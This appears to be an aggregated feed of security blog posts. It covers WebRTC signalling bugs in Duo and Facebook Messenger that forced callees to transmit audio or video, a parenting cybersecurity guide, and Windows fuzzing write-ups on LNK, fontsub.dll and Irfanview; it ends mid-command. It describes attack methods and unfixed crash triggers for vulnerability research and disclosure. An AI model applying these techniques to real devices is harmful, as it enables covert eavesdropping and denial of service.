Neither of these methods effectively prevents video from being transmitted from callee to caller. The SDP property is easy to get around because the caller provides the SDP to the callee, so it can be easily altered. Disabling the video track as soon as the offer is processed should work, except for the asynchronous design. Normally, the setLocalDescription method (which processes the SDP offer) calls the callback onSetSuccess, and then sets up the peer-to-peer connection after the callback has finished. However, if the callback makes another asynchronous call, the guarantee that onSetSuccess finishes before the connection is set up no longer holds, because the setLocalDescription method only waits for the onSetSuccess thread to finish. This creates a race between disabling the video and setting up the connection, so in some situations, the callee could transmit a few video frames to the caller before transmission is disabled.

I tested this by using Frida to alter the SDP sent by the callee, and then I tried many methods to win the race. It turned out to be fairly hard to win, and I spent roughly two weeks trying to figure out how to slow down the video disable call enough to give the connection time to set up. I ended up sending multiple offers and adding candidates to the offers, which decreased the connection time, as the network connection was already established. Then I sent many messages that take a long time to process through the data channel of the peer-to-peer connection to slow down the disabling of the video track. Data messages are processed on the same thread queue as disabling the video track in Duo, so sending data messages filled up the queue that was needed to disable video with many other entries, delaying the track being disabled.

This bug was fixed in December 2020 by removing the asynchronous call from onSetSuccess. While Duo generally designed signalling in a way that is effective in preventing video transmission from callee to caller, implementing the design asynchronously introduced problems. Asynchronous signalling implementations are becoming more common on mobile applications, as there are many unpredictable situations in which WebRTC needs to wait on the network or a peer, and separating function calls into different threads means a delay in one call won’t affect unrelated functionality. However, asynchronous calls make it more difficult to model how a state machine will behave in all situations, so it is important to be cautious about adding asynchronous calls to WebRTC signalling. In this case, the asynchronous call to disable the video track added nothing in terms of performance, as there is no reason any of the calls made to disable the track could block, and onSetSuccess already runs in its own thread and can yield to higher priority threads. It’s important to balance the risk and benefit of asynchronous calls and not indiscriminately include them in an application.

Facebook Messenger

I looked at Facebook Messenger in October 2020. It was a fairly challenging target because of the amount of reverse engineering required. Stepping back a bit, WebRTC has bindings in several programming languages which allow it to be integrated into applications using that language. Most Android applications that integrate WebRTC use the Java bindings. This makes investigating signalling state machines fairly straightforward, as important Java functions, such as setLocalDescription (which processes offers and answers), addRemoteIceCandidate (which processes candidates) and addTrack (which adds tracks to connections) can be hooked in Frida and logged for analysis. It is also reasonably straightforward to change the behavior of the attacker device using these calls.

Facebook Messenger does not use the Java bindings to integrate WebRTC; instead it uses the C++ bindings. Moreover, it statically links WebRTC into a larger library (librtcR20.so, which is likely the rsys library mentioned in this article), so the symbols for calls to the bindings get stripped, making them difficult to hook. In addition, Facebook Messenger serializes SDP into another format before it is transmitted, so it is difficult to determine how signalling works by monitoring traffic.

I eventually realized that the only reasonable way to figure out how Facebook Messenger signalling works was to figure out its network protocol. Thankfully, Facebook has publicly stated that they use fbthrift, a branch of thrift. I loaded the librtcR20.so library into IDA to see if I could find where it called into the thrift library, but while there were a few calls, it looked like the code was mostly statically linked. I eventually figured out that this is because thrift generates serialization code for every protocol implemented, so most of the serialization and deserialization code ends up compiled with the protocol processing code. So I decided to compile fbthrift, make a sample serializer and look at it in IDA, so I could get an impression of what compiled fbthrift serializers look like. I noticed that during serialization, members of an object are serialized by calling a method called writeFieldBegin. I also noticed that when this method is called, the field name is required, even though it is usually not included in the serialized output. So I looked for a function in librtcR20 that was very frequently called with different string parameters that seemed reasonable for field names. Not very many functions fulfilled that criteria, so I was able to identify writeFieldBegin.

At this point, I could find many places where objects are serialized, and needed to identify which one was the message used to set up WebRTC calls.

Earlier, I’d noticed a method in the library called P2PCall::OnP2PMessageFromPeer (note that the symbol for this method is stripped, but the method name is logged when it is called). This seemed a likely place that a deserialized message would be processed. Searching for the string “P2PMessage”, I found the serialization code for a type called P2PMessageRequest. I assumed that this was where call setup messages were created.

Thrift serialization code is generated based on class definitions in a thrift definition file. Based on the field names and types passed to writeFieldBegin, I was able to slowly reverse engineer the complete thrift definition for this type. It was tedious work, because the definition was fairly long, and the code is obfuscated in a way that makes register use inconsistent, so I wasn’t confident that any automated approach would be accurate.

Below is a sample of the serialization code.

Notice that it writes two fields from an object of type Extmap. The first, named id, is a mandatory field. The function that writes the field is as follows.

The field identifier written is 1, and the field type is 8, which translates to i32 (32-bit integer). The second field is an optional field, and the registers to write it are set in the following code.

This sets the field name to uri, the field identifier to 2, and the field type to 8 (also i32). All together, this code can be represented by the following thrift definition.

```
struct Extmap {
        1: i32 id
        2: optional i32 uri
}
```

After similarly reverse engineering every field of the P2PMessageRequest type, I had a complete thrift definition, available here.

I did two things with this thrift definition.  First, I used it to determine the layout of the P2PMessageRequest type in C++. This was extremely valuable, as it allowed me to load the struct definition into IDA with every single field named correctly. This made it much easier to understand how incoming messages are handled in P2PCall::OnP2PMessageFromPeer. This ended up being a bit of a process. fbthrift can generate C++ header files directly from a thrift definition, but these are very long and contain a lot of unnecessary definitions, and can not be processed by IDA. So I ended up compiling the generated source and loading it into IDA, and then exporting the structure definitions and importing them into another IDA instance where librtcR20.so was already loaded. A few fields had different sizes in my compilation versus Facebook’s, but it was close enough that I could get it to work with a few modifications.

Below is an example of code decompiled in IDA with the thrift definition imported, to give an idea of how much easier it makes it to understand the processing of the message object.

I was also able to decode and generate messages sent over the network. To do this, I generated the serialization code from the thrift definition in Python, as thrift supports code generation in many languages. Then, I was able to import this code when using Frida Python to hook functions in Facebook Messenger.

Then I needed to find the code that handled incoming P2PMessageRequest messages. Since these messages are handled by native code, while most Facebook messages are handled by Java code, I looked for a native call with an appropriate name. I found com.facebook.webrtc.WebrtcEngine.onThriftMessageFromPeer. I hooked this method with Frida, fed its byte array parameter into the generated deserializer, and it decoded incoming messages.

I found a similar method used to send thrift messages, sendThriftToPeer (this method’s class name is obfuscated and changes in every version of Facebook Messenger, but it can be found by grepping the application’s smali). I was also able to hook this method, and alter its byte array parameter, to change a P2PMessageRequest message sent by Facebook Messenger.

Now, I was able to understand Facebook Messenger’s signalling state machine. There are two different ways that signalling can occur, depending on where the user is signed into Facebook Messenger. If the user is signed in on multiple devices or browsers, very little happens before the callee interacts with their device. The offer, answer and candidates are exchanged, but they are stored by the callee device and not processed until the callee user answers the call. This makes sense, because Facebook Messenger doesn’t know what device to connect to otherwise.

If the callee is only signed in on a single device, the state machine is more interesting.

In this case, Facebook Messenger enables the track as soon as an offer is received, but alters the offer so that all outgoing streams are inactive. It then replaces the offer with one where they are active when the user interacts with the device.

I was concerned that there might be a way to bypass the alteration of the offer, but I looked at how this was done, and while I generally don’t recommend using anything other than adding or disabling tracks to disable input device transmission, it was fairly robust. The offer is altered after the SDP is decoded into an internal WebRTC object, and the changes are made directly to this object, which eliminates the possibility of parsing errors.

However, looking at how incoming messages are handled, I noticed that many message types other than offers, answers and candidates are processed before the call is answered. One type that stood out was called SdpUpdate. When an SdpUpdate message is received, the local offer or answer is updated by calling setLocalDescription.

This message type didn’t do anything when sent to the state machine above, as it is already storing SDP and waiting to call setLocalDescription. But in the situation where the user is logged into two devices, it caused setLocalDescription to be called and started the audio connection.

It is not clear what the SdpUpdate message type is used for in Facebook Messenger. I tried many scenarios on my test devices, including network switchover, and was not able to generate one in normal use. Regardless, it is clear that it was not intended for this message type to be received before the call is answered. It is similar to the Signal bug described above, in that it is not related to the application’s use of WebRTC, but due to a missing check when handling input that can cause state transitions.

This vulnerability was fixed in November 2020 with server changes that prevent this message type from being sent before a call is connected.

Other Applications

There were a few other applications I looked at and did not find problems with their state machines. I looked at Telegram in August 2020, right after video conferencing was added to the application. I did not find any problems, largely because the application does not exchange the offer, answer or candidates until the callee has answered the call. I looked at Viber in November 2020, and did not find any problems with their state machine, though challenges reverse engineering the application made this analysis less rigorous than the other applications I looked at.

Discussion

The majority of calling state machines I investigated had logic vulnerabilities that allowed audio or video content to be transmitted from the callee to the caller without the callee’s consent. This is clearly an area that is often overlooked when securing WebRTC applications.

The majority of the bugs did not appear to be due to developer misunderstanding of WebRTC features. Instead, they were due to errors in how the state machines are implemented. That said, a lack of awareness of these types of issues was likely a factor. It is rare to find WebRTC documentation or tutorials that explicitly discuss the need for user consent when streaming audio or video from a user’s device.

Many of these state machines had needless complexity in how they handled call set-up, which was also a factor. Unnecessary threading, reliance on obscure features and large numbers of states and input types increase the likelihood of this type of vulnerability occurring in a signalling state machine.

It is also concerning to note that I did not look at any group calling features of these applications, and all the vulnerabilities reported were found in peer-to-peer calls. This is an area for future work that could reveal additional problems.

Conclusion

I investigated the signalling state machines of seven video conferencing applications and found five vulnerabilities that could allow a caller device to force a callee device to transmit audio or video data. All these vulnerabilities have since been fixed. It is not clear why this is such a common problem, but a lack of awareness of these types of bugs as well as unnecessary complexity in signalling state machines is likely a factor. Signalling state machines are a concerning and under-investigated attack surface of video conferencing applications, and it is likely that more problems will be found with further research.

Two Pink Lines

15 January 2021 at 18:58

Depending on your life experiences, the phrase (or country song by Eric Church) “two pink lines” may bring up a wide range of powerful emotions.    I suspect, like many fathers and expecting fathers, I will never forget the moment I found out my wife was pregnant.  You might recall what you were doing, or where you were and maybe even what you were thinking.   As a professional ethical hacker, I have been told many times – “You just think a little differently about things.”   I sure hope so, since that’s my day job and sure enough this experience wasn’t any different.  My brain immediately asked the question, “How am I going to ensure my family is protected from a wide range of cyberthreats?”   Having a newborn opens the door to all sorts of new technology and I would be a fool not to take advantage of all devices that makes parenting easier.   So how do we do this safely?

The A-B-C’s

The security industry has a well-known concept called the “principle of least privilege.” This simply means that you don’t give a piece of technology more permissions or access than it needs to perform its primary function. This can be applied well beyond just technology that helps parents; however, for me it’s of extra importance when we talk about our kids. One of the parenting classes I took preparing for our newborn suggested we use a baby tracking phone app. This was an excellent idea, since I hate keeping track of anything on paper. So I started looking at a few different apps for my phone and discovered one of them asked for permission to use “location services,” also known as GPS, along with access to my phone contacts. This caused me to pause and ask: why does an app to track my baby’s feeding schedule need to know where I am? Why does it need to know who my friends are? These are the types of questions parents should consider before just jumping into the hottest new app. For me, I found a different, less popular app which has the same features, just with a little less access.

It’s not always as easy to just “find something else.” In my house, “if momma ain’t happy, nobody is happy.” So, when my wife decided on a specific breast pump that came with Bluetooth and internet connectivity, that’s the one she was going to use. The app backs up all the usage data to a server in the cloud. There are many ways that this can be accomplished securely, and it is not necessarily a bad feature, but I didn’t feel this device benefited from being internet connected. Therefore, I simply lowered its privileges by not allowing it internet access in the settings on her phone. The device works perfectly fine, she can show the doctor the data from her phone, yet we have limited our online exposure and footprint just a little more. This simple concept of least privilege can be applied almost everywhere and goes a long way toward limiting your exposure to cyber threats.

Peek-A-Boo

I think one of the most sought after and used products for new parents is the baby monitor or baby camera.   As someone who has spent a fair amount of time hacking cameras (or cameras on wheels) this was a large area of concern for me.  Most cameras these days are internet connected and if not, you often lose the ability to view the feed on your phone, which is a huge benefit to parents.  So how, as parents, do we navigate this securely?  While there is no silver bullet here, there are a few things to consider.    For starters, there are still many baby cameras on the market that come with their own independent video screen.  They generally use Wi-Fi and are only accessible from home.  If this system works for you, use it.  It is always more secure to have a video system which is not externally accessible.   If you really want to be able to use your phone, consider the below.

  • Where is the recorded video and audio data being stored? This may not seem important if the device is internet connected anyway, but it can be.  If your camera data is being stored locally (DVR, SD card, network storage, etc.), then an attacker would need to hack your specific device to obtain this information.   If you combine this with good security hygiene such as a strong password and keeping your device updated, an attacker has to work very hard to access your camera data.  If we look at the alternative where your footage is stored in the cloud, and it becomes subject to a security breach, now your camera’s video content is collateral damage.  Large corporations are specifically targeted by cybercriminals because they provide a high ROI for the time spent on the attack; an individual practicing good cybersecurity hygiene becomes a much more difficult target providing less incentive for the attacker, thus becoming a less likely target.
  • Is the camera on the same network as the rest of your home? An often-overlooked security implication of many IoT devices, especially cameras, goes beyond the threat of spying: the threat of a network entry point. If the camera itself is compromised it can be used as a pivot point to attack other devices on your network. A simple way to reduce this risk is to utilize the “guest” network feature that comes by default on almost all home routers. These guest networks are preset to be isolated from your main network and generally require little to no setup. By simply attaching your cameras to your guest network, you can reduce the risk of a compromised camera leading a cybercriminal to the banking info on your laptop.

Background checks – Not only for babysitters

Most parents, especially new ones, like to ensure that anyone who watches their children is thoroughly vetted. There are a ton of services out there to do this for babysitters and nannies; however, it’s not as easy to vet the companies that create the devices we put in our homes. So how do we determine what is safe? My father used to tell me: “It’s how we respond to our mistakes that makes the difference.” When researching a company or device, should you find that the device has had a vulnerability, the vendor’s response time and accountability can often tell you if it’s a company you should be investing in. Some things to look for include:

  • Was the vulnerability quickly patched?
  • Are there unpatched bugs still?
  • Has a vendor self-reported flaws, fixed them and reported to the public they have been fixed?
  • Are there numerous outstanding bugs filed against a company or device?
  • Does the company not recognize the possibility of bugs in their products?

These answers can often be discovered on a company’s website or in release notes, which are generally attached to an update of a piece of software.   Take a minute to read the notes and see if the company is making security updates. You don’t need to understand all the details, just knowing they take security seriously enough to update frequently is important.  This can help tip the scales when deciding between devices or apps.

Remember, you can do this!

Through my preparation for becoming a new parent, I constantly read in books and was told by professionals, “Remember, you can do this!” Cybersecurity in the context of being a parent is no different. Every situation is different, and it is important to do what works for you and your family. As parents, we shouldn’t be afraid to use all the cool new gadgets emerging on the market, but instead educate ourselves on how to limit our risk. Which features do I need, and which ones can I do without? Remember to always follow a vendor’s recommendations and best practices, and of course remember to breathe!

The post Two Pink Lines appeared first on McAfee Blog.

Some DOS bugs while processing Microsoft LNK files

By: linhlhq
30 June 2020 at 01:27

As mentioned in the article about CVE-2020-1299 [1], in this article I will present some bugs I found in Windows' processing of the "LNK search" file format. I will also introduce pe-afl [2], a fuzzer I usually use instead of WinAFL when WinAFL is unstable on newer versions of Windows.

 

The bugs I present below are not fixed; I wrote this blog post at the suggestion of MSRC, who will prepare answers to customer questions around these unfixed bugs.


Introduction


I used pe-afl to fuzz the "LNK search" file format. This is a file format I had ignored until ZDI published a blog post analyzing a bug related to it [3]; the structure of the "LNK search" format is described very clearly in ZDI's blog (I think it is too complicated, so I didn't read much of it, lol).


Pe-afl


As I have mentioned before, WinAFL does not work well on new Windows versions; in addition, WinAFL uses dynamic instrumentation to calculate coverage, which adds overhead and reduces performance.


Pe-afl is a fuzzer built on AFL for closed-source binaries. It uses static instrumentation to calculate coverage and drive feedback. Static instrumentation generally performs better than dynamic instrumentation. However, pe-afl currently only supports instrumenting 32-bit binaries and has some limitations, because not every binary can be instrumented (most binaries built with Visual Studio can be). There is an introductory slide deck and talk for pe-afl [4][5].

 

Using pe-afl is similar to using WinAFL, except that WinAFL requires DynamoRIO to calculate coverage and drive feedback while pe-afl does not. Pe-afl uses IDA to find basic blocks, which are highlighted as shown in the picture.



Pe-afl then inserts code at the beginning of these basic blocks to mark coverage. A binary instrumented by pe-afl is similar to a program built with afl-gcc's instrumentation.



With pe-afl we instrument the DLLs, or even the EXE executables, we want to fuzz (pe-afl also supports instrumenting and fuzzing kernel .sys drivers). The fuzzer then does everything from calculating coverage to driving feedback, like AFL.



Windows.storage.search.dll and StructuredQuery.dll

 

Debugging with the harness I used for fuzzing in the previous article [1], I found the program loads two more DLLs, windows.storage.search.dll and StructuredQuery.dll, to parse an "LNK search" file.



I wanted to use pe-afl to fuzz both DLLs, not just StructuredQuery.dll. However, pe-afl can only track coverage for one module, so to cover more modules I decided to modify pe-afl's source a bit.

 

Pe-afl uses a 65536-byte array to store coverage for a single module, so I doubled the size of this array to cover one more module. This approach is quite simple but significantly hurts the fuzzer's running speed. I don't know what DynamoRIO does to cover multiple modules at once, but for now this simple method is all I have. I capped my patched pe-afl at covering 3 modules at a time. I also integrated @thuanpv_'s aflfast [6] and MOpt [7] (inspired by afl++ [8]).
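Conceptually the change looks like the sketch below: the shared map grows to one 64KB slice per instrumented module, and each module's stubs write into their own slice (the symbol names are mine, not pe-afl's actual source). The fuzzer then has to scan two or three times as many bytes after every execution, which is where the speed penalty comes from:

#include <cstdint>

// Hedged sketch of the multi-module patch described above: one 64KB
// coverage slice per instrumented module instead of a single bitmap.
static const uint32_t MAP_SIZE    = 1 << 16;  // original 65536-byte map
static const uint32_t MAX_MODULES = 3;        // patched upper limit
extern uint8_t *shared_mem;                   // now MAP_SIZE * MAX_MODULES bytes

static inline void log_edge(uint32_t module_idx, uint32_t cur, uint32_t *prev) {
    uint8_t *map = shared_mem + module_idx * MAP_SIZE;  // this module's slice
    map[(cur ^ *prev) % MAP_SIZE]++;
    *prev = cur >> 1;
}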



Above is one of the pieces of code I modified in pe-afl. Checking how it works after my changes, using afl-showmap:



Now everything was ready except the most important thing: a corpus. A corpus for the "LNK search" file format is not mentioned anywhere on the internet, so the only option was to create one by hand. I used Explorer's search interface, creating search cases under conditions such as date, kind, and size, but still only produced about 200 files (tedious work makes me impatient).



I then used afl-cmin to reduce the corpus and started fuzzing. I ran pe-afl against the two DLLs, windows.storage.search.dll and structuredquery.dll; after one week I checked the crashes the fuzzer had found and had 3 unique ones:

- Stack overflow (0xc00000fd)
- 2 null pointer dereferences

 

All three crashes occur in structuredquery.dll and can crash explorer.exe.

I reported them to Microsoft, but they said these bugs only cause a temporary DoS and would not be fixed. In my opinion, however, due to the nature of LNK files, Explorer will always process them automatically by default. Ordinary users who hit these cases will often not understand the cause well enough to fix it (simply deleting the file would work, but with Explorer crashing continuously that is very hard to do).



Conclusion

 

Above are some bugs I found in the "LNK search" file format. I will not publish these DoS POCs, but anyone who reads this blog and follows along can easily reproduce them; there may even be RCE-capable bugs that I failed to find (I think bugs still exist in LNK file processing). Windows users should protect themselves and not casually download file formats such as LNK; your machine could be exploited as soon as such a file is saved to disk.

 

[1] https://blog.vincss.net/2020/06/cve49-microsoft-windows-lnk-remote-code-execution-vuln-cve-2020-1299-eng.html

[2] https://github.com/wmliang/pe-afl

[3] https://www.zerodayinitiative.com/blog/2020/3/25/cve-2020-0729-remote-code-execution-through-lnk-files

[4] https://www.slideshare.net/wmliang/make-static-instrumentation-great-again-high-performance-fuzzing-for-windows-system

[5] https://www.youtube.com/watch?v=OipNF8v2His

[6] https://github.com/mboehme/aflfast

[7] https://github.com/puppet-meteor/MOpt-AFL

[8] https://github.com/AFLplusplus/AFLplusplus



Microsoft's first bug

By: linhlhq
31 May 2020 at 04:32
Continuing the series on fuzzing, in this post I will share how I find attack surfaces on Windows to fuzz. Windows handles a great many file formats, and studying and fuzzing those formats is a common way to find Windows bugs today. The approach and fuzzing process are exactly the same as finding bugs in Irfanview, which I covered in the previous post.

Many people probably wonder how to find an attack surface. Simply put, when you study something long enough and deeply enough, you start to see the directions from which it can be attacked. That sounds out of reach for most beginners, because not everyone is that good. But the interesting thing is that many excellent researchers willingly share everything they research, and the bugs they find, with the community. Google Project Zero (P0) [1] is one example: I read and track the bugs published there (including bugs from long ago). From them I learned about bug classes, attack surfaces, and the components that commonly produce bugs on different platforms. More simply, every month I also follow Microsoft's patches [2] and check whether the fixed bugs are interesting and suited to my fuzzing direction.

Introduction

Back to fuzzing file formats on Windows: as we know, Windows has many DLLs, each with its own job. For now I focus on the DLLs that handle file formats, some common ones being media formats (audio, video, image) and others such as XML, XPS, PDF, and the registry. These DLLs export APIs for developers to use when building Windows applications, and Windows' built-in components use these APIs as well.

Microsoft itself provides MSDN [3], a repository where we can read and learn how to use those APIs. Beyond the API documentation, Microsoft is also generous with sample code; I usually refer to the Microsoft GitHub repo [4]. It helps a great deal when building harnesses to fuzz file formats on Windows.

Microsoft Font Subsetting


Windows fonts are a file format I find very diverse: both kernel mode and user mode have font-processing components. P0 has published several posts on fuzzing Windows fonts [5] [6], all very clear and high quality. Among the font-related bugs P0 found, the fontsub.dll library caught my attention.



Up to the time P0 published bugs in this library, nobody had previously tried fuzzing fontsub.dll.


The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D.


The DLL exports two API functions: CreateFontPackage [7] and MergeFontPackage [8].


unsigned long CreateFontPackage(
  const unsigned char  *puchSrcBuffer,
  const unsigned long  ulSrcBufferSize,
  unsigned char        **ppuchFontPackageBuffer,
  unsigned long        *pulFontPackageBufferSize,
  unsigned long        *pulBytesWritten,
  const unsigned short usFlag,
  const unsigned short usTTCIndex,
  const unsigned short usSubsetFormat,
  const unsigned short usSubsetLanguage,
  const unsigned short usSubsetPlatform,
  const unsigned short usSubsetEncoding,
  const unsigned short *pusSubsetKeepList,
  const unsigned short usSubsetListCount,
  CFP_ALLOCPROC        lpfnAllocate,
  CFP_REALLOCPROC      lpfnReAllocate,
  CFP_FREEPROC         lpfnFree,
  void                 *lpvReserved
);

unsigned long MergeFontPackage(
  const unsigned char  *puchMergeFontBuffer,
  const unsigned long  ulMergeFontBufferSize,
  const unsigned char  *puchFontPackageBuffer,
  const unsigned long  ulFontPackageBufferSize,
  unsigned char        **ppuchDestBuffer,
  unsigned long        *pulDestBufferSize,
  unsigned long        *pulBytesWritten,
  const unsigned short usMode,
  CFP_ALLOCPROC        lpfnAllocate,
  CFP_REALLOCPROC      lpfnReAllocate,
  CFP_FREEPROC         lpfnFree,
  void                 *lpvReserved
);

 


P0 also published the harness they built [9]; it is very good and covers all the parameters passed to these two functions. I used that harness to fuzz.
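P0's loader [9] is the harness actually used here. Purely to illustrate the call, a much-simplified sketch of feeding one mutated font through CreateFontPackage might look like the following; the CFP_* callback typedefs and the platform/encoding values are my stand-ins for the fontsub.h definitions, not verified values:

#include <windows.h>
#include <cstdio>
#include <cstdlib>

// Simplified stand-ins for the CFP_* typedefs from fontsub.h.
typedef void *(__cdecl *CFP_ALLOCPROC)(size_t);
typedef void *(__cdecl *CFP_REALLOCPROC)(void *, size_t);
typedef void (__cdecl *CFP_FREEPROC)(void *);

typedef unsigned long (__cdecl *CreateFontPackage_t)(
    const unsigned char *, unsigned long, unsigned char **, unsigned long *,
    unsigned long *, unsigned short, unsigned short, unsigned short,
    unsigned short, unsigned short, unsigned short, const unsigned short *,
    unsigned short, CFP_ALLOCPROC, CFP_REALLOCPROC, CFP_FREEPROC, void *);

int main(int argc, char **argv) {
    if (argc < 2) return 1;
    FILE *f = fopen(argv[1], "rb");
    if (!f) return 1;
    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    fseek(f, 0, SEEK_SET);
    unsigned char *buf = (unsigned char *)malloc(size);
    fread(buf, 1, size, f);
    fclose(f);

    HMODULE mod = LoadLibraryA("fontsub.dll");
    if (!mod) return 1;
    CreateFontPackage_t create =
        (CreateFontPackage_t)GetProcAddress(mod, "CreateFontPackage");

    unsigned char *out = NULL;
    unsigned long out_size = 0, written = 0;
    unsigned short keep[] = { 0x41 };   // character IDs to keep in the subset
    create(buf, (unsigned long)size, &out, &out_size, &written,
           0 /*usFlag*/, 0 /*usTTCIndex*/, 0 /*usSubsetFormat*/,
           0 /*usSubsetLanguage*/, 3 /*usSubsetPlatform (assumed: Microsoft)*/,
           1 /*usSubsetEncoding (assumed: Unicode)*/, keep, 1,
           malloc, realloc, free, NULL);
    return 0;
}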


In addition to the harness, P0 published a tool that mutates TTF/OTF files [10]; I think this tool is the key that let P0 find so many font bugs.


Based on these, I began to find and build a corpus:

    1. Collect a corpus from P0's publications, previously published bugs, and downloads from the internet
    2. Mutate this corpus with P0's tool
    3. Use winafl-cmin to reduce the corpus
    4. Check coverage
    5. Return to step 2


I repeated this process until the coverage I achieved on fontsub.dll looked as follows:



With the test cases I mutated I could reach 53.22% coverage of fontsub.dll overall, 81.08% of CreateFontPackage, and 76.40% of MergeFontPackage. I figured this was enough to start fuzzing.


I ran WinAFL with 1 master and 7 slaves; after a few hours I started seeing the first crashes, and after a few days I went back and started triaging them.


Most of them were stack overflows (0xc00000fd):



Two of them were bugs P0 had reported earlier that Microsoft chose not to fix [11] [12].

There was also a crash that, in my opinion, looks quite similar to a bug P0 reported earlier that Microsoft had fixed [13].



I reported it, and Microsoft accepted it for a fix. It appears to be a variant of the bug Microsoft had fixed before. It was fixed in the April 2020 patch (CVE-2020-0687); I wrote a root cause analysis of the bug that anyone can read [14]. (In that article, pay attention only to the bug analysis; the impact section was not written by me, and of course bugs like this cannot realistically yield a full exploit.)


According to Google's timeline, the bug was fixed in August 2019, but I fuzzed the patched version and the bug persisted until January 2020 (the moment I reported it to Microsoft).


I am not surprised that Microsoft did not completely fix the bug; what surprises me is that P0 published this project long ago and nobody had used it to find bugs.


Conclusion


This bug was not hard to find; everything was sitting right in front of you, but nobody jumped on it. You can see that the steps I followed are all laid out in the previous article, all basic knowledge, and you barely have to reverse anything to write the harness. Microsoft's documentation is very complete: read it, learn it, and try things out. If you stop at reading blogs, I don't think you will get far.


Bugs found by fuzzing Windows file formats are appearing less and less often. Because so many people use this approach, you have to spend a lot of time researching new attack surfaces and file formats nobody has studied yet in order to find bugs.


The next blog post will cover a file format bug for which Microsoft awarded me the maximum bounty in the Windows Insider Preview Bounty. I will probably publish it after Microsoft's June 2020 patch is released, or later.


[1] https://googleprojectzero.blogspot.com/

[2] https://portal.msrc.microsoft.com/en-us/security-guidance/acknowledgments

[3] https://docs.microsoft.com/en-us/

[4] https://github.com/microsoft/Windows-classic-samples

[5] https://googleprojectzero.blogspot.com/2016/06/a-year-of-windows-kernel-font-fuzzing-1_27.html

[6] https://googleprojectzero.blogspot.com/2016/07/a-year-of-windows-kernel-font-fuzzing-2.html

[7] https://docs.microsoft.com/en-us/windows/win32/api/fontsub/nf-fontsub-createfontpackage

[8] https://docs.microsoft.com/en-us/windows/win32/api/fontsub/nf-fontsub-mergefontpackage

[9] https://github.com/googleprojectzero/BrokenType/tree/master/ttf-fontsub-loader

[10] https://github.com/googleprojectzero/BrokenType/tree/master/ttf-otf-mutator

[11] https://bugs.chromium.org/p/project-zero/issues/detail?id=1863

[12] https://bugs.chromium.org/p/project-zero/issues/detail?id=1866

[13] https://bugs.chromium.org/p/project-zero/issues/detail?id=1868

[14] https://blog.vincss.net/2020/04/cve44-microsoft-font-subsetting-dll-heap-corruption-in-ReadTableIntoStructure-cve-2020-0687.html



Start fuzzing, Fuzz various image viewers

By: linhlhq
24 May 2020 at 08:16

I am returning to writing about what I have done over the past year; it has been two years since I last blogged. In this article I will share the fuzzing experience I have gained using popular fuzzers to find bugs in closed-source products. My environment of interest is Windows, and the fuzzers I usually use target products on this platform. In this article I will use a popular fuzzer called WinAFL to find bugs in popular image viewers such as Irfanview [1], FastStone [2], and XnView [3].


Introduction


I will not go deep into WinAFL's architecture or how to use it. I'll leave some links [4] [5] covering these topics at the end of the article for anyone interested.


Why did I choose image viewers as a fuzzing target? File format fuzzing is arguably the most popular fuzzing direction today. It takes little time to prepare, is accessible, and corpora are easy to find (depending on the case), and the parsing logic for these file formats still has a very high chance of containing bugs.


Here I will take Irfanview as an example: how I approach it and use a fuzzer to find bugs in Irfanview's image format parsing.


Reverse and understand


Irfanview handles many image file formats. Some are handled in the i_view32.exe program itself, while others are handled by plugins deployed as DLLs.


We need to understand how image files flow into the program. Whether reversing that logic is quick or slow, hard or easy, depends on the complexity of each program; complex programs take a lot of time.


In this case, however, I will use DynamoRIO [6] (a tool that computes a program's coverage as it executes) to speed up my reversing.


Using DynamoRIO with IDA's Lighthouse plugin [7], we can tell, for a given input, which paths the program takes and which code it executes, saving a lot of reversing time.


For example, when Irfanview processes a jpeg2000 image, this drrun.exe command generates the coverage file:

drrun.exe -t drcov -- i_view32.exe _00042.j2k

With this command, DynamoRIO generates a file containing the list of loaded DLLs and the coverage of the program and of each DLL.


Here is an example coverage output file:



We can see that JPEG2000.dll is loaded while processing the _00042.j2k file.


Now load the result into IDA with the Lighthouse plugin. The instructions highlighted in green are the ones executed when i_view32.exe processed the _00042.j2k file.



From there we trace back to the jpeg2000 processing functions; searching for related strings is the fastest and most effective approach I know. We can see that i_view32.exe loads the JPEG2000.dll library and then calls the ReadJPG2000_W() function to process the jpeg2000 file.


Let's debug to see the parameters passed to ReadJPG2000_W(); set a breakpoint at the address that calls the function:

Based on the state of the stack at the moment ReadJPG2000_W() is called, the parameters passed to the function are as follows:

- wchar_t *argv1: the name of the jpeg2000 file to process.
- int argv2: a variable holding the value 0.
- wchar_t *argv3: a buffer of size 2048.
- wchar_t *argv4: a buffer of size 2048, initialized with the string "None".
- int argv5, argv6: used to store parameters while parsing the jpeg2000 file.


It is very simple: we can build a harness that calls this function and passes the above parameters to parse a jpeg2000 image file, because these parameters are completely independent of the i_view32.exe program.


Here is the harness that I wrote:
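(The original harness was shown as a screenshot, which is not reproduced here.) Based on the parameter description above, a minimal sketch of such a harness might look like the following; the exact ReadJPG2000_W prototype is my reconstruction from the stack layout, not Irfanview's header:

#include <windows.h>

// Assumed prototype, reconstructed from the stack state described above.
typedef int (__cdecl *ReadJPG2000_W_t)(
    wchar_t *path, int zero, wchar_t *buf1, wchar_t *buf2,
    int *arg5, int *arg6);

int wmain(int argc, wchar_t **argv) {
    if (argc < 2) return 1;
    HMODULE mod = LoadLibraryA("JPEG2000.dll");
    if (!mod) return 1;
    ReadJPG2000_W_t read_jp2 =
        (ReadJPG2000_W_t)GetProcAddress(mod, "ReadJPG2000_W");
    wchar_t buf1[2048] = {0};
    wchar_t buf2[2048] = L"None";   // observed to be initialized with "None"
    int arg5 = 0, arg6 = 0;
    read_jp2(argv[1], 0, buf1, buf2, &arg5, &arg6);
    return 0;
}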



Run the harness with a jpeg2000 file as input and check its coverage of JPEG2000.dll.

Great: it matches i_view32.exe's jpeg2000 processing flow.

With this harness we can start fuzzing. I used corpora from these GitHub repos:

 - openjpeg

 - go-fuzz-corpus

 - and some corpus from previous fuzz projects.

With Lighthouse we can also see the coverage of each function in the DLL.


With the file I used, coverage of the ReadJPG2000_W function was only about 34%. That figure is of course not ideal for fuzzing; you should hunt for corpus files that push this number as high as possible.


Use WinAFL to fuzz jpeg2000 with the harness built above:
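An invocation modeled on the WinAFL README might look like the line below; the paths, target offset, and iteration count are illustrative, not the values actually used here:

afl-fuzz.exe -i in -o out -D C:\DynamoRIO\bin32 -t 20000 -- ^
  -coverage_module JPEG2000.dll -target_module harness.exe ^
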